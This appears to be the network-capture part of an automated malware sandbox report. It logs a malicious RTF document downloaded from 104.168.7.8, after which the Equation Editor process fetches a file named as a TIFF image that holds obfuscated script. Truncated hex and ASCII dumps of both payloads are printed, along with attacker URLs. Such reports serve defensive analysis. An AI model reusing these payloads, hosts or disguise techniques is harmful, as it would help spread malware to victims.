                                                                                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
                                                                                                                                Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
                                                                                                                                Oct 1, 2024 09:25:20.090223074 CEST224INData Raw: 3f 2d 37 5f 3f 3f 2b 25 40 35 5b 26 40 60 5d 3c 3f 2e 26 2a 7e 3f 3f 3b 5d 2a 3c 3f 7e 31 39 3f 39 5b 37 21 37 21 39 36 3b b0 23 3c 3e 29 23 25 27 5b 3b 5e 3e 3f 21 34 3f 3e 2e 36 3f 2d 40 40 3c 3e 36 3f 2b 3f 40 2c 60 3c 2a 3a 3c 36 31 3f 32 34
                                                                                                                                Data Ascii: ?-7_??+%@5[&@`]<?.&*~??;]*<?~19?9[7!7!96;#<>)#%'[;^>?!4?>.6?-@@<>6?+?@,`<*:<61?24/]5???)0`&!4[2[9%4~?0&,*?&~>_?(83660?/1?]-!`(?>?1<,)/'?#?3:^,'_?[2*2?-1.)]~];%!~]9+2`@`?[786,~`=252%8:)`~<]]2#6*;=)|.[;>7$_!~&=69]$>|%
                                                                                                                                Oct 1, 2024 09:25:20.090238094 CEST1236INData Raw: 33 31 36 25 25 37 3c 3f 5f 3c 26 3f 40 27 34 7c 25 25 b0 3d 29 3f 21 40 30 a7 7c 5d 3f 35 7e 26 5d 3f 3f 3c 5b 38 5f 26 5b 35 35 37 5f 24 21 3f 3e 7e 24 39 2e 7e 32 33 30 33 5b 37 7c b0 32 5f 37 3e 2c 28 3f 3e 3c 5d 3a 2d 39 24 a7 21 2b 25 3f 25
                                                                                                                                Data Ascii: 316%%7<?_<&?@'4|%%=)?!@0|]?5~&]??<[8_&[557_$!?>~$9.~2303[7|2_7>,(?><]:-9$!+%?%~2_0>23,?,(??1+'.981/'7'`+)(#362?83/+?2!<=.653|?)9~?/(^#|/-`+?(`$3$^`'982,&|27/9-@/4?0-5.`1&-%[%@.%`'04`9$_3!1|.`-|5<[6|'9_`?]?.?$.51->_%8&<-5?/_?-_$
                                                                                                                                Oct 1, 2024 09:25:20.090300083 CEST1236INData Raw: 7c b5 40 36 28 2a 31 7c 37 23 2f 31 a7 30 3d 40 7c 5e 40 38 3f 25 32 3f 34 25 b0 23 35 3f 2f 28 5d 37 2c 23 29 2b 60 2d 35 31 2d 3f 31 3f 23 3c 27 26 39 7e 36 31 21 38 2b 3f 5b 33 5b 35 25 3f 3a a7 3f 3e 5e 3f 31 24 3f 34 7c 35 7c 3f 40 7e 37 5d
                                                                                                                                Data Ascii: |@6(*1|7#/10=@|^@8?%2?4%#5?/(]7,#)+`-51-?1?#<'&9~61!8+?[3[5%?:?>^?1$?4|5|?@~7]?#)#?&??|0?)?#~?~^?=@/0#8+&?_15>3!8%`?[4?-?%%4#@&%`(9)'88[0:!^?5'=3+)^&3#?1%%5248%0`&?8*??!;1)68-@)?]&?>?67<?;@8>1-%:?0=2:.['6/+:#%?4@?[<$2?`@=-]4;^&77?+
                                                                                                                                Oct 1, 2024 09:25:20.090310097 CEST1236INData Raw: 2f 2b 3f 2e b0 32 34 3c 5e 30 5e 2c 3d 26 2c b0 3f 3f 60 36 26 2c 26 36 a7 33 2e 3c 40 23 a7 60 2e 3f 3f 3f 26 2a 34 b0 3f 2c 36 2b 3b 2c 24 3f 24 3f 23 5e 3f 39 b0 25 26 21 2e 3f 26 40 3f 34 3f 28 27 3d 7c 39 b5 5f 3c 39 3e 5f 5e 5f 2d 40 3d 2b
                                                                                                                                Data Ascii: /+?.24<^0^,=&,??`6&,&63.<@#`.???&*4?,6+;,$?$?#^?9%&!.?&@?4?('=|9_<9>_^_-@=+<,![?5#=*3<('6_%4??[//=#.)!]1%?017#72[~=*5!9<:?[+??#+_#&1$6@&4<3<?;*?$?.^`&$<@'=~#0,9_6[!?+*;|%_+?'^33|[5>,7??5?11+(?/0@85!*4?@'.8%.?%-=<=(5),*>]>0[:*%2
                                                                                                                                Oct 1, 2024 09:25:20.090320110 CEST1236INData Raw: 2f 7c 21 29 3a 3f b5 3b 3b 60 29 2c 37 7c 7c 25 2f 24 5e 33 21 27 35 b5 25 2f 7e 26 23 28 b5 2e 37 3a 39 3f b0 34 7c 23 2c 3a 2f 2e 5d 5e 3e 3a 3f 31 26 3f b5 2a 60 5d 5e 27 33 a7 2b 31 24 3d 35 27 3c 5d 3e 38 5e 3c 28 25 25 3d 32 60 24 21 26 29
                                                                                                                                Data Ascii: /|!):?;;`),7||%/$^3!'5%/~&#(.7:9?4|#,:/.]^>:?1&?*`]^'3+1$=5'<]>8^<(%%=2`$!&)+?%5>?5%*/?&?~13[??9/`?;9?;`;?=.~)#%?8;?-10$>@(:**?>0)(:1_?)%.='?('8_4%_`*4~?>#.<0^;0*.2~&_:0)#8*?]/=#$%''/0?((;?)3%$8!(>>]83=85(?7?#)'<##`?,%<@+%<&15##;[%
                                                                                                                                Oct 1, 2024 09:25:20.090326071 CEST1236INData Raw: 40 3f 3b 31 3f 2d 27 32 3b 2f 3a 32 29 26 2a 3a 39 a7 24 2a 7c 39 2f 39 25 26 2c 7c 25 a7 38 38 32 3d 7e 35 34 39 33 2d 38 7e 3f 35 3f 2c 35 40 5b 29 7c 5b 5d 25 7c b5 23 37 5b 3f 33 3e 3e 37 24 3f b0 3f 3f 2e b5 28 25 34 3a 5b 3c 39 60 30 2c a7
                                                                                                                                Data Ascii: @?;1?-'2;/:2)&*:9$*|9/9%&,|%882=~5493-8~?5?,5@[)|[]%|#7[?3>>7$???.(%4:[<9`0,:.$7]]~?61|38%:@+9~>^1'%;=4$%<*.^&<3_?`-!-;24]0?`~63?9-1?.%?|)%<:-2%(&0~@_<?|5/&7^+=8%03@%,3_=@9+%-]?,%1:/3<9#8-?::+$@_9<~?.`03?%?((|`!_]&^:[8(@89[
                                                                                                                                Oct 1, 2024 09:25:20.090429068 CEST1236INData Raw: 32 39 31 39 36 35 39 38 36 38 32 37 37 30 34 33 30 30 36 39 31 36 74 63 70 68 71 69 71 65 64 74 7a 70 70 69 6e 70 69 68 6a 64 73 70 6a 6a 6d 79 6c 63 71 71 6a 56 57 4d 57 5a 44 53 4a 44 41 4e 46 4b 43 54 43 5a 57 59 48 49 46 45 38 35 32 30 33 36
                                                                                                                                Data Ascii: 2919659868277043006916tcphqiqedtzppinpihjdspjjmylcqqjVWMWZDSJDANFKCTCZWYHIFE85203657026617}}f41e2 \bin063 b020000
                                                                                                                                Oct 1, 2024 09:25:20.090445995 CEST1236INData Raw: 20 20 09 20 20 20 20 09 09 09 09 09 09 09 20 09 20 09 20 20 20 20 09 20 20 20 09 20 09 09 09 20 09 09 20 30 63 63 09 09 09 09 20 20 09 20 09 20 09 20 20 09 09 20 20 20 20 09 09 09 20 09 09 20 20 20 20 09 20 20 09 20 20 20 20 09 09 09 09 09 09 09
                                                                                                                                Data Ascii: 0cc 05 00 0
                                                                                                                                Oct 1, 2024 09:25:20.090455055 CEST1236INData Raw: 20 20 09 20 09 09 20 20 20 20 20 09 09 20 20 20 09 20 09 09 09 09 20 20 20 20 20 09 20 20 20 20 09 09 09 09 09 20 09 20 20 09 20 09 20 09 20 09 09 20 09 09 20 37 31 09 20 09 09 09 20 09 20 20 20 09 20 09 20 09 09 20 09 20 09 20 09 09 09 09 09 20
                                                                                                                                Data Ascii: 71 77 e58
                                                                                                                                Oct 1, 2024 09:25:20.090465069 CEST1236INData Raw: 09 20 09 20 09 09 20 09 09 20 66 09 09 20 20 09 09 20 20 20 20 20 20 20 09 09 09 09 09 20 09 09 09 09 09 09 20 20 20 20 20 20 09 09 20 09 09 09 09 20 20 20 09 20 09 09 20 20 09 09 20 09 20 09 09 09 20 20 20 20 09 09 20 09 09 20 61 64 65 20 09 09
                                                                                                                                Data Ascii: f ade aed 6
                                                                                                                                Oct 1, 2024 09:25:20.090660095 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:19 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
                                                                                                                                ETag: "10e7f-6235f5034649d"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 69247
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/msword
                                                                                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
                                                                                                                                Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
                                                                                                                                Oct 1, 2024 09:25:20.090948105 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:19 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
                                                                                                                                ETag: "10e7f-6235f5034649d"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 69247
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/msword
                                                                                                                                Data Raw: 7b 5c 72 74 66 31 0d 0d 0d 0d 0d 0d 09 09 09 09 09 09 09 09 09 09 7b 5c 2a 5c 6c 69 6e 65 46 69 6c 6c 48 65 69 67 68 74 36 33 32 36 39 39 39 36 31 20 5c 3b 7d 0d 7b 5c 35 34 39 36 36 34 38 35 30 3f 37 a7 36 5f 3f 60 33 30 38 34 25 5f 34 36 5d 2a 3f 35 32 5b 3b 3f 40 3f 3d 2b 21 5e 25 3f 5b 3f a7 3f a7 31 5e 3c 5d 2a 26 31 3f 5f 25 38 3f 3b 26 3f 2e 3a 5e 28 39 24 5f 60 27 25 3f 40 5e 60 3f 34 5e 26 5b b0 31 34 7e 39 b0 3f 2d 23 3b 27 24 2c 2f 3d 37 21 40 27 5b 5b a7 33 30 2d 32 7c 38 2e 3a 3f 29 3f 25 3d 5b 5e 38 40 7c 27 3c 5e 2b 33 36 a7 3a 5d b5 7c 3b 38 a7 b0 5e 2b 5b 2a 3f 3f 2f 33 b0 25 37 2d 36 2c 25 36 2e 5f 2e 3f 3f 3d 28 60 2e 23 24 33 2d 3c 25 7e 38 7c b0 3a 3f 7c 26 29 a7 b5 2e 3f 38 34 b5 40 35 7c 3f 3b 2a 27 28 5f 40 b5 3a 5b 3a 3b 2f 21 2b 31 3e 28 2b 25 2f 3d 31 3a 2f 2c 24 34 2e 3f 2d 24 7c 26 35 33 25 7c 3f 40 32 3f 29 31 21 33 b0 b5 29 40 27 b5 5d 3f 2f b5 29 5b 7c 2f 21 25 25 29 23 23 26 2d 3b 60 27 3f 34 3f 5d a7 2d 2d 39 5f 3d b5 21 26 25 a7 2e 7e 3e 2c 2a 3f 26 37 27 2c 23 2c [TRUNCATED]
                                                                                                                                Data Ascii: {\rtf1{\*\lineFillHeight632699961 \;}{\549664850?76_?`3084%_46]*?52[;?@?=+!^%?[??1^<]*&1?_%8?;&?.:^(9$_`'%?@^`?4^&[14~9?-#;'$,/=7!@'[[30-2|8.:?)?%=[^8@|'<^+36:]|;8^+[*??/3%7-6,%6._.??=(`.#$3-<%~8|:?|&).?84@5|?;*'(_@:[:;/!+1>(+%/=1:/,$4.?-$|&53%|?@2?)1!3)@']?/)[|/!%%)##&-;`'?4?]--9_=!&%.~>,*?&7',#,.?|$!'!,.`_*=8_36_:%#?6%>!`^3/`?*1@.&?8)`36:+[;#?7`%.;$0&!?@--%6@<((`<[+>*?;0+7_?7]]`?%:;?[+(,$%11<?`3%=^7?_@'=[??<=@)=??4/97?78]!2#%?]=&|8??&[*]7|%?^??%]!?_-#>%%5?>|@=?3`3>58/?(8,2=?@|,.&?_?%;4?4?@--?3&(..8''5,~>~%-==/64|4&%|3_.~~|@633)?^8!767_&<%*>7@!/_;-9@|?[#0!#:(31@-|#!/^2/8|1?3/8???8!@~?1$?(7,?61$3)<~)9;2>+41!+0:40?>?(?(5:6:_~&,#&)+($?3@?!9'&?3]??<'@!?418*;'=!=9?.!?#<.2*&|?[0#+)11%-[9:&|88<^>83?843)8&%/,[??<?1?('?/&4=0_%0*<+,]*)==]3?|`_`:|+*2`]2.&!332!!-%;,!?=%6#(??9/:*&)<_#^|97*?+@?#?|))?0:*6<:@0;|^?/8)?9&~:0(=6=,?[4&/&1'`6$>
                                                                                                                                Oct 1, 2024 09:25:21.422795057 CEST272OUTHEAD /510/RN/creambananacakegoodforladieswholovethebananasametimesheknowtheveryniceideadslawyasgetbackgreatthingswithme____securethingsareinthr.doc HTTP/1.1
                                                                                                                                User-Agent: Microsoft Office Existence Discovery
                                                                                                                                Host: 104.168.7.8
                                                                                                                                Content-Length: 0
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 1, 2024 09:25:21.533859015 CEST321INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:21 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:22:14 GMT
                                                                                                                                ETag: "10e7f-6235f5034649d"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 69247
                                                                                                                                Keep-Alive: timeout=5, max=99
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/msword


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.2249169104.168.7.8803800C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 1, 2024 09:25:21.899398088 CEST334OUTGET /510/niceworkwithpcitureupdateson.tIF HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                Host: 104.168.7.8
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Oct 1, 2024 09:25:22.366844893 CEST1236INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 01 Oct 2024 07:25:22 GMT
                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                Last-Modified: Tue, 01 Oct 2024 00:17:02 GMT
                                                                                                                                ETag: "3eaa0-6235f3d910fca"
                                                                                                                                Accept-Ranges: bytes
                                                                                                                                Content-Length: 256672
                                                                                                                                Keep-Alive: timeout=5, max=100
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: image/tiff
                                                                                                                                Data Raw: ff fe 55 00 55 00 4c 00 47 00 6d 00 63 00 52 00 6a 00 51 00 4e 00 57 00 4b 00 70 00 57 00 6d 00 6b 00 50 00 4c 00 57 00 50 00 69 00 6e 00 4c 00 57 00 68 00 6f 00 20 00 3d 00 20 00 22 00 6b 00 41 00 66 00 7a 00 4e 00 43 00 4b 00 6a 00 4b 00 47 00 6e 00 4c 00 42 00 50 00 66 00 65 00 73 00 6b 00 53 00 57 00 4c 00 4b 00 6e 00 47 00 63 00 65 00 22 00 0d 00 0a 00 41 00 4b 00 4c 00 61 00 6e 00 69 00 65 00 62 00 69 00 55 00 4c 00 4b 00 62 00 6e 00 47 00 42 00 69 00 4c 00 4b 00 72 00 75 00 6d 00 4c 00 42 00 57 00 47 00 20 00 3d 00 20 00 22 00 53 00 52 00 74 00 47 00 50 00 66 00 69 00 6b 00 75 00 6c 00 57 00 4b 00 57 00 75 00 49 00 76 00 52 00 6d 00 4e 00 48 00 68 00 43 00 43 00 70 00 6b 00 4c 00 22 00 0d 00 0a 00 48 00 47 00 4c 00 50 00 55 00 69 00 7a 00 63 00 4c 00 50 00 43 00 57 00 71 00 57 00 4c 00 78 00 6b 00 50 00 65 00 6e 00 6d 00 52 00 6a 00 4c 00 6b 00 65 00 20 00 3d 00 20 00 22 00 57 00 50 00 6d 00 63 00 4c 00 6f 00 54 00 4b 00 64 00 55 00 4e 00 62 00 4c 00 4b 00 6b 00 4c 00 4b 00 76 00 57 00 4b 00 [TRUNCATED]
                                                                                                                                Data Ascii: UULGmcRjQNWKpWmkPLWPinLWho = "kAfzNCKjKGnLBPfeskSWLKnGce"AKLaniebiULKbnGBiLKrumLBWG = "SRtGPfikulWKWuIvRmNHhCCpkL"HGLPUizcLPCWqWLxkPenmRjLke = "WPmcLoTKdUNbLKkLKvWKRNWlTp"ihdjUCoKKAeWvffGIoqKLGAGAd = "ZehNexLgikCWmWCBleRzlexchB"iWCcPWZxHWUebTphWedpeKckiK = "fPdPhWcchelRWhKGNUWWekArUK"cdKoOpkJoGWKNxZLmtWHQtWeem = "LLcpAZGmlGWZamctegLbeGKorm"ZLzpLWhGfdbmLGWPGqtdRuWLUa = "iNcczLWGeoehlzBmPWtLKLWzpL"penzUULNWPhjeHeJeGioUbefqK = "efWhzSOtOWuLWmHPR
                                                                                                                                Oct 1, 2024 09:25:22.366871119 CEST224INData Raw: 00 6e 00 41 00 5a 00 68 00 65 00 57 00 55 00 50 00 61 00 22 00 0d 00 0a 00 4f 00 70 00 68 00 4b 00 70 00 69 00 5a 00 6f 00 6c 00 41 00 55 00 4c 00 66 00 71 00 69 00 4f 00 7a 00 55 00 63 00 62 00 69 00 4c 00 4b 00 57 00 6b 00 63 00 20 00 3d 00 20
                                                                                                                                Data Ascii: nAZheWUPa"OphKpiZolAULfqiOzUcbiLKWkc = "dprKkWBxocphZNkdKziKxozLGL"ldcQKpUtKTufbdKqNKKfzZmqZc = "kLWKcQoPIkn
                                                                                                                                Oct 1, 2024 09:25:22.366883039 CEST1236INData Raw: 00 70 00 75 00 4e 00 6a 00 47 00 61 00 4b 00 68 00 6f 00 78 00 6f 00 42 00 4c 00 49 00 4c 00 22 00 0d 00 0a 00 0d 00 0a 00 69 00 53 00 52 00 63 00 4c 00 50 00 66 00 62 00 71 00 4c 00 6c 00 48 00 64 00 68 00 65 00 5a 00 5a 00 69 00 74 00 61 00 55
                                                                                                                                Data Ascii: puNjGaKhoxoBLIL"iSRcLPfbqLlHdheZZitaUWphAo = "dKPHWOiLLscxAIaveemTUGAiOK"RrxhOPUaGWgbWKivbnhAokUKpW = "ZiUWzepGrRWW
                                                                                                                                Oct 1, 2024 09:25:22.366889954 CEST1236INData Raw: 00 72 00 47 00 47 00 47 00 47 00 4f 00 49 00 72 00 69 00 71 00 72 00 63 00 47 00 50 00 43 00 6f 00 4e 00 6b 00 61 00 69 00 57 00 57 00 68 00 63 00 6c 00 41 00 20 00 3d 00 20 00 22 00 69 00 65 00 74 00 52 00 49 00 4c 00 6f 00 6b 00 62 00 4c 00 78
                                                                                                                                Data Ascii: rGGGGOIriqrcGPCoNkaiWWhclA = "ietRILokbLxGOvKcexKmAqlNep"hUjqkKcZGPGKlbnLZilohzeUuL = "GKPiKPLZKlpSLUGaKgKWcxSLzi"WKq
                                                                                                                                Oct 1, 2024 09:25:22.366895914 CEST1236INData Raw: 00 20 00 3d 00 20 00 22 00 47 00 62 00 6b 00 4e 00 70 00 6b 00 42 00 6c 00 57 00 68 00 4f 00 57 00 57 00 49 00 55 00 4c 00 55 00 42 00 4b 00 4b 00 68 00 4e 00 47 00 6b 00 6f 00 4a 00 22 00 0d 00 0a 00 42 00 49 00 7a 00 4b 00 71 00 50 00 49 00 4b
                                                                                                                                Data Ascii: = "GbkNpkBlWhOWWIULUBKKhNGkoJ"BIzKqPIKnWxPZoxoKGfKULoCcW = "KdkWdLiBLdBnNTccPArWdPUfPf"eGcPHqLkOuLLZLpbSLGkLiOKhU =
                                                                                                                                Oct 1, 2024 09:25:22.366903067 CEST672INData Raw: 00 6d 00 4c 00 6b 00 70 00 75 00 4c 00 4e 00 78 00 66 00 41 00 65 00 41 00 4b 00 63 00 47 00 4c 00 22 00 0d 00 0a 00 72 00 71 00 62 00 73 00 54 00 7a 00 51 00 6f 00 67 00 6b 00 63 00 68 00 70 00 67 00 6d 00 6b 00 78 00 54 00 41 00 6d 00 57 00 57
                                                                                                                                Data Ascii: mLkpuLNxfAeAKcGL"rqbsTzQogkchpgmkxTAmWWcPKN = "NULicPitNWNfGOlOsIjaWUSGZW"fLbCIzWblcgkWlbkWWoxWvWmZP = "xLLiqUNObsoUr
                                                                                                                                Oct 1, 2024 09:25:22.367078066 CEST1236INData Raw: 00 4c 00 53 00 64 00 78 00 62 00 4f 00 4a 00 4c 00 62 00 57 00 20 00 3d 00 20 00 22 00 69 00 4c 00 57 00 50 00 4c 00 55 00 4b 00 70 00 69 00 4e 00 55 00 62 00 6f 00 4c 00 62 00 48 00 70 00 69 00 57 00 71 00 55 00 4c 00 65 00 4c 00 61 00 66 00 22
                                                                                                                                Data Ascii: LSdxbOJLbW = "iLWPLUKpiNUboLbHpiWqULeLaf"santistaioWRUZKmUWzLiCGZobceAHWi = "KieLLTfxHPcrPLWcBbfdWTGkQP"iLpCngeJKQqTU
                                                                                                                                Oct 1, 2024 09:25:22.367145061 CEST1236INData Raw: 00 68 00 57 00 71 00 75 00 6b 00 4c 00 76 00 75 00 4b 00 6b 00 69 00 52 00 6e 00 53 00 4c 00 5a 00 51 00 6e 00 22 00 0d 00 0a 00 4b 00 63 00 62 00 57 00 66 00 65 00 52 00 6b 00 6b 00 65 00 57 00 5a 00 6c 00 52 00 66 00 69 00 6e 00 74 00 52 00 4e
                                                                                                                                Data Ascii: hWqukLvuKkiRnSLZQn"KcbWfeRkkeWZlRfintRNkGUzxp = "hkticfWWvKtcIfLPWkWUmhAlWh"IKcqqzWLiWiAeGjLoZInddIAac = "LNcGizhLzxW
                                                                                                                                Oct 1, 2024 09:25:22.367156982 CEST1236INData Raw: 00 0a 00 4a 00 64 00 6c 00 50 00 4c 00 70 00 63 00 4b 00 71 00 68 00 57 00 71 00 4a 00 53 00 6b 00 50 00 65 00 69 00 50 00 41 00 64 00 70 00 64 00 74 00 74 00 6f 00 20 00 3d 00 20 00 22 00 71 00 57 00 62 00 57 00 4c 00 78 00 48 00 70 00 6e 00 78
                                                                                                                                Data Ascii: JdlPLpcKqhWqJSkPeiPAdpdtto = "qWbWLxHpnxKdhfuThZhcUklLhW"WBiLiKachZWSSWLKSScWmBpaiW = "LlntStmOrmpSitkcWhPKhoiGbW"LL
                                                                                                                                Oct 1, 2024 09:25:22.367225885 CEST1236INData Raw: 00 68 00 20 00 3d 00 20 00 22 00 4b 00 5a 00 4b 00 52 00 55 00 4c 00 4c 00 69 00 67 00 47 00 69 00 49 00 4c 00 42 00 4c 00 65 00 4e 00 48 00 47 00 48 00 4a 00 50 00 63 00 63 00 52 00 42 00 22 00 0d 00 0a 00 55 00 75 00 6c 00 50 00 61 00 6d 00 55
                                                                                                                                Data Ascii: h = "KZKRULLigGiILBLeNHGHJPccRB"UulPamUqAUKWNmbNCeRacAWgcH = "kGLUCfNQmGOchZnkcKQizGCAWx"bdKLqfLWKGcsQbbfdLgAlZbpnK =
                                                                                                                                Oct 1, 2024 09:25:22.372024059 CEST1236INData Raw: 00 4c 00 4c 00 6d 00 41 00 69 00 22 00 0d 00 0a 00 47 00 68 00 57 00 69 00 71 00 5a 00 4a 00 75 00 78 00 6f 00 54 00 69 00 54 00 61 00 4e 00 63 00 53 00 4c 00 48 00 53 00 65 00 6e 00 4f 00 70 00 57 00 43 00 20 00 3d 00 20 00 22 00 52 00 42 00 63
